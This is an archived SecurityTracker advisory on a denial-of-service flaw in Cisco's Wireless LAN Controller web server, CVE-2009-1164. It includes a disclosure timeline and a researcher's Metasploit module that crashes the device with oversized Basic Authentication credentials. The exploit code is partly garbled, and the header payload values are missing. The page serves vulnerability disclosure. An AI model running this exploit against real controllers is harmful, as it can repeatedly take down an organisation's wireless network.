Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Device (Router/Bridge/Hub)  >   Cisco Wireless LAN Controller Vendors:   Cisco
Cisco Wireless LAN Controller Basic Authentication Processing Bug Lets Remote Users Deny Service
SecurityTracker Alert ID:  1022600
SecurityTracker URL:
CVE Reference:   CVE-2009-1164   (Links to External Site)
Updated:  Oct 16 2009
Original Entry Date:  Jul 27 2009
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.2 prior to, 4.2 prior to, 5.0 prior to
Description:   A vulnerability was reported in the Cisco 4402 Wireless LAN Controller. A remote user can cause denial of service conditions.

A remote user can send specially crafted authentication data to the target emweb http daemon to cause the target device to reboot.

Supplying HTTP Basic Authentication data with a username and password each longer than 63 characters to '/screens/frameset.html' can trigger the flaw.

The vendor was notified on January 13, 2009.

A demonstration exploit is provided:

Authorization: Basic

The vendor has assigned Cisco Bug ID CSCsx03715 to this vulnerability.

Versions 4.1, 4.1M, 4.2M, and 6.0 are not affected.

Christoph Bott reported this vulnerability.

Impact:   A remote user can cause the target device to crash.
Solution:   The vendor has issued a fix (,,

The vendor's advisory is available at:

Vendor URL: (Links to External Site)
Cause:   Not specified

Message History:   None.

 Source Message Contents

Subject:  [Full-disclosure] Cisco WLC 4402 Denial-of-Service vulnerability

Vulnerable Product: Cisco WLC 4402 (most likely among many others)
Vulnerability discovered: January 2009
Reported to vendor: Jan 01, 2009
Fix available: not yet

+ 01/11/2009: discovered vulnerability on a customer's site

+ 01/13/2009: initial vendor contact via

+ 01/14/2009: vendor opened PSIRT case ID PSIRT-1018301631

+ 02/09/2009: vendor states, that bugfix is _not_ contained within

+ 03/30/2009: vendor states: "We have a fix  for this issue. However,
due to some other issues we are investigating we may not make this
public until about 42 days."

+ 06/02/2009: vendor states: "I really apologize for the delay on
publishing this advisory. The reason that we have not publish is because
we are also incorporating other security fixes within all the affected
releases. We WILL be publishing the advisory on July 8th, 2009 at 1600 UTC."

+ 07/24/2009: Customer agreed with full disclosure

+ 07/26/2009: Still no fixes available; full disclosure due to lacking
vendor activities.

The Cisco WLC 4402 is a Wireless LAN Controller, which is manageable via
an integrated embedded webserver (emweb httpd).

The vulnerability described below could have been verified on WLC 4402,
software release However, since the vulnerability affects the
integrated embedded emweb http daemon, several other products and/or
software releases might be affected, too.

Using long, random authentication data, the embedded web server can be
crashed, which leeds to a device reboot. Subsequently repeated requests
lead to a permanent denial of service of the WLC (and therefore of the
whole wireless infrastructure).

Not needed.

One only has to call
and provide Basic Authentication data which uses
a username and password longer than 63 characters each.

The following header worked for me:
Authorization: Basic

The following code snippet can be used as a module within the metasploit

---- snip -----
require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Exploit::Remote::Tcp
        include Msf::Auxiliary::Dos

        def initialize(info = {})
                        'Name'           => 'Cisco WLC 4200 Basic Auth
Denial of Service',
                        'Description'    => %q{

                                This module triggers a Denial of Service
condition in the Cisco WLC 4200
                                HTTP server. By sending a GET request
with long authentication data, the
                                device becomes unresponsive and reboots.
Firmware is reportedly vulnerable.
                        'Author'                => [ 'Christoph Bott
<msf[at]>' ],
                        'License'        => MSF_LICENSE,
                        'Version'        => '$Revision: 5949 $',
                        'References'     =>
                                        [ 'BID', '???'],
                                        [ 'CVE', '???'],
                                        [ 'URL',
                        'DisclosureDate' => 'January 26 2009'))

                        ], self.class)


        def run

                print_status("Sending HTTP DoS packet")

                sploit =
                        "GET /screens/frameset.html HTTP/1.0\r\n" +
                        "Authorization: Basic

                sock.put(sploit + "\r\n")



---- snip ----

Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC